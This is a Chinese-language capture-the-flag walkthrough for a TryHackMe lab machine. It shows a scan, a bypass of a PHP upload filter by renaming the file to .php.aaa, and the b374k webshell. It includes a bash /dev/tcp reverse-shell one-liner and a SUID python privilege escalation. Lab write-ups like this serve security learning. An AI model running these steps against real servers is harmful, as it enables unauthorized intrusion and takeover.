• 網址 : https://tryhackme.com/room/rrootme
• IP : 10.10.233.205

掃描

• 起手式 nmap
  • nmap -A 10.10.233.205
  • 
    • 22 : SSH
      • 7.6p1 有枚舉的漏洞 CVE-2018-15473
      • https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py
    • 80 : Apache
      • Apache httpd 2.4.29
• 掃路徑
  • python3 dirsearch.py -u http://10.10.233.205/ -e all
  • 看起來可能會有趣的路徑
    • /panel/
    • /uploads/

上傳 Webshell

• /panel/ 可以上傳檔案
  • 
  • 用 Wappalyzer 可以確定他是 PHP
    • 
• 這邊我們來上傳個多功能的 Web shell 玩玩ㄅ
• 上傳 b374k.php
  • https://github.com/b374k/b374k
  • 
    • 會噴錯，Google翻譯說 PHP是不允許的！ (葡萄牙文)
• 試著使用 Apache 文件解析的漏洞
  • 把檔名改成 b374k.php.aaa
  • 
  • Google 翻譯 :文件上傳成功！

使用 Webshell

• 點擊下面的 Veja! 會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
  • 
  • 使用預設密碼 b374k 就能進入 shell

戳入 Reverse Shell

• 終端機輸入 nc -vlk 7877
  • webshell 的 Terminal 輸入
    • bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
  • 即可順利連上 Reverse shell
    • 
• 交互型 Reverse shell
  • python -c 'import pty; pty.spawn("/bin/bash")'
• 取得 User Flag
  • 

提權

• 使用內建的上傳功能，上傳 LinEnum.sh
  • 開啟權限 chmod +x LinEnum.sh
• 執行 LinEnum 並順便輸出到檔案
  • ./LinEnum.sh | tee meow.txt
  • 
• 尋找到有趣的東西
  • /usr/bin/python 有 SUID
• 到 GTFOBins 找 Python 有 SUID 的提權方法
  • python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
• 提權成功
  •